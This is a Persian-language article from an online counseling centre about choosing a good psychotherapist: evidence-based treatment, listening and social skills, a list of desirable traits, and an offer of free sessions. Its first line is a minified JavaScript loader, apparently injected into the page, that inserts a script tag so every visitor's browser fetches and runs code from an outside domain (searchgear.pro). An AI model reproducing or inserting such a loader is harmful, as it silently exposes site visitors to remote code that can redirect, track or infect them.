;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); روان‌درمانگر خوب کیست و چه ویژگی‌هایی دارد؟ | مرکز مشاوره آنلاین روان‌یاری
بهترین روان درمانگر

روان‌درمانگر خوب کیست و چه ویژگی‌هایی دارد؟

میزان پیشرفت خواندن شما

فهرست مطالب

بیماران روحی برای صحبت کردن با روان درمانگر نیاز به اعتماد دارند، همچنین این بیماران نباید مورد قضاوت قرار بگیرند. درک احساسات افرادی که به روانشناس، مشاور، روانپزشک و… مراجعه می کنند، اهمیت دارد. آن ها به درک از سمت درمانگران نیاز دارند. بهترین روان درمانگر به بیماران کمک می کنند تا احساسات خود را بهتر مدیریت کنند و با مشکلات خود کنار بیایند. این موضوع باعث بهبود سلامت عاطفی آن ها می شود.

بهترین روان درمانگر

صحبت کردن در مورد خصوصی ترین مسائل زندگی می تواند دلهره آور باشد. این مسئله همیشه آسان نیست اما می تواند زندگی مراجعه کننده را تغییر دهد. برای طی کردن این فرآیند، لازم است بهترین روان درمانگر را پیدا کنید تا بتوانید به او اعتماد کنید.

تحقیقات نشان می دهد که یکی از مهم ترین جنبه های روان درمانی، رابطه ای است که با روان درمانگر خود برقرار می کنید. یک رابطه قوی به شما کمک می کند تا بر چالش هایی که در زمان حال با آن روبرو هستید، غلبه کرده و از وقایع دردناک گذشته نجات پیدا کنید.

روان درمانگر خوب

چگونه یک روان درمانگر خوب انتخاب کنیم؟

در حالی که تراپیست های بسیاری خدمات به مراجعه کنندگان ارائه می کنند اما پیدا کردن یک روان درمانگر ایده آل همواره کار سختی است. برای پیدا کردن یک درمانگر مناسب زمان زیادی در نظر بگیرید و صبور باشید. در این حالت گزینه مناسبی پیدا می کنید.

بعد از اینکه روان درمانگر مناسب خود را به روش های مختلف پیدا کردید، حالا باید چند نکته مهم را مدنظر قرار دهید:

ابتدا به شکل تلفنی با روان درمانگر تماس بگیرید و ببینید که آیا درمانگر با درمان مبتنی بر شواهد برای نگرانی های شما آشنایی دارد. آیا درمانگر شما از درمان مبتنی بر شواهد در کار خود استفاده می کند یا خیر. درمان های مبتنی بر شواهد جزء درمان هایی هستند که به صورت علمی آزمایش شده اند و اثربخشی آن ها تایید شده است. این درمان برای موارد مختلف به عنوان مثال برای افسردگی، اضطراب، حملات پانیک، شب ادراری کودکان، رفتار وسواسی جبری و… کاربردی می باشد. بهتر است از درمانگر بپرسید که آیا تجربه ای در زمینه مشکلات و نگرانی های شما داشته است یا خیر.

برخی از درمانگران در کار با کودکان یا خانواده ها، بزرگسالان یا افراد مسن تخصص دارند. برخی ممکن است تجربه زیادی در مورد مشکلاتی که شما را نگران می کنند، داشته باشند. در صورت امکان، میزان تجربه آن ها را ارزیابی کنید. بهتر است بدانید که روان درمانگر شما چه نوع درمانی برای مشکل تان ارائه می دهد (به عنوان مثال، درمان طولانی مدت در مقابل کوتاه مدت، درمان فردی یا گروهی) و ببینید که آیا این درمان با انتظارات شما مطابقت دارد یا خیر. به یاد داشته باشید که انتخاب یک درمانگر موضوع کاملا شخصی است. هیچ درمانگری وجود ندارد که برای همه خوب باشد. مهم است که به او اعتماد داشته باشید تا این درمانگر بتواند به شما کمک کند.

بعد از اینکه همه این اطلاعات را جمع آوری کردید، کمی به خود فرصت دهید و اطلاعات را ارزیابی کنید.

  چه زمانی نیاز به مشاوره داریم؟
انتخاب روان درمانگر

دانش و مهارت‌های روان‌درمانگر

یک روان درمانگر خوب می تواند با طیف وسیعی از افراد همدلی کرده و احساسات آن ها را درک کند. درمانگران باید از نظر عاطفی خود را به مراجعه کنندگان نزدیک کنند، همچنین باید به آن ها کمک کنند تا احساسات خود را شناسایی و بیان کنند، برای مثال، یک فرد عصبانی ممکن است احساس بی کفایتی داشته باشد که خود این احساس، خشم را در وجود فرد بیشتر می کند. در این حالت، درمانگر با درک احساسات، فرد را تحت درمان قرار می دهد.

مهارت های شنیداری

تقریباً در تمام اشکال درمان، روان درمانگر باید مشتاقانه به صحبت‌های افراد گوش دهد و افکار مراجعه کنندگان را منعکس کند. در نهایت نیز باید رویدادها و احساسات مهمی را که از سمت بیمار به او منتقل می شود، به خاطر بسپارد. یک درمانگر باید به چیزهایی که فرد بیمار به کسی نمی گوید، توجه کند.

مهارت های اجتماعی و ارتباطی

مهارت های اجتماعی خوب می تواند روان درمانگر را در انتخاب نوع درمان به راحتی کمک کند. اگر درمانگر ارتباط اجتماعی خوبی داشته باشد، می تواند به راحتی احساسات و مشکلات نگران کننده فرد بیمار را کشف کند. در این حالت کمک به فرد بیمار ساده تر می شود.

ویژگی‌های روان‌درمانگر خوب

یک روان درمانگر مناسب کسی است که:

  • مشتاقانه گوش می دهد
  • مهربان و دلسوز است
  • صداقت را تمرین می کند
  • شفاف صحبت می کند
  • در مورد آنچه مراجعه کنندگان می گویند، بسیار فکر می کند
  • به مراجعه کنندگان خود آموزش می دهد (مهارت های مقابله، علائم، مدیریت استرس و غیره)
  • حس صمیمیت را به مراجعه کنندگان انتقال می دهد
  • احساسات مراجعه کنندگان را منعکس و تأیید می کند
  • رفتار انسان و اختلالات روانی را به خوبی درک می کند
  • قضاوت نمی کند
  • مرزهای سالم را تعیین می کند و به آن پایبند است
  • به مراجعه کنندگان خود اهمیت می دهد
  • دارای طیف گسترده ای از تکنیک ها و ابزارهای متنوع است
  • متواضع است و کمتر نصیحت می کند
  • مکانی امن برای درمان ایجاد می کند
  • آگاه (روش های مبتنی بر شواهد، تحقیقات جاری و غیره) و باهوش است
  • دارای هوش هیجانی است
  • محترم است
  • همدلی را تجربه و منتقل می کند
  • حس شوخ طبعی دارد
  • کنجکاو است
  • صبر دارد
  • قابل اعتماد است
  • دیدگاه های دیگر را می شناسد و برای آن ها ارزش قائل است

اهمیت انتخاب روان درمانگر مناسب

بیماران وقتی به روان درمانگر مراجعه می‌کنند، انتظار دارند که با او به راحتی ارتباط برقرار ‌کنند و احساس امنیت داشته باشند. در این صورت به احتمال زیاد سر صحبت را با او باز خواهند کرد. صحبت کردن در مورد احساسات، آسیب ها و ناملایمت های شخصی دشوار است. بیماران اگر با درمانگر خود راحت نباشند، ممکن است نتوانند با او ارتباط بگیرند.

رشد و بهبود در روان درمانی باید با احساس امنیت آغاز شود. این موضوع معمولاً زمانی اتفاق می‌افتد که فرد با رویکرد درمانی روان درمانگر نسبت به مشکل خود موافق باشد یا پذیرای آن باشد. در این حالت، شما به احتمال زیاد از درمانگر خود پیروی می کنید.

یک روان درمانگر مناسب بهتر از هر فردی در زندگی شخصی بیمار می تواند با او ارتباط بگیرد. درمانگران می توانند احساساتی که بیماران هرگز آن ها را به زبان نمی آورند، بفهمند. این مهارت و قابلیت در طی سال ها آموزش تئوری، آکادمیک و تجربه به دست آمده است. اگر بیمار در جلسه اول درمان متوجه شد که با درمانگر خود احساس راحتی نمی کند یا درمانگر نمی تواند به خوبی با او ارتباط بگیرد، احتمالاً درمانگر خود را اشتباه انتخاب کرده است. در برخی از موارد نیز بیمار با درمانگران آماتور و کم تجربه مواجه می باشد. قابلیت هایی که درمانگران دارند، باعث شده از بقیه افراد متمایز باشند.

  یک روانشناس خوب چه ویژگی هایی دارد؟
روان درمانگر

اگر این ویژگی ها در وجود یک روان درمانگر احساس نمی شود، به احتمال زیاد آن ها هنوز در حیطه کاری خود خیلی با تجربه نیستند. درمانگران با تجربه و کار بلد سخت ترین و کم حرف ترین افراد را نیز در جلسه درمان وادار به صحبت می کنند، چون حرف زدن تنها راه ارتباطی مراجعه کننده و درمانگر می باشد. از طرفی با صحبت کردن و ارتباط موفق با بیمار می توان مشکلات، وضعیت بهبودی، سلامت عاطفی و… او را به خوبی تشخیص داد.

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.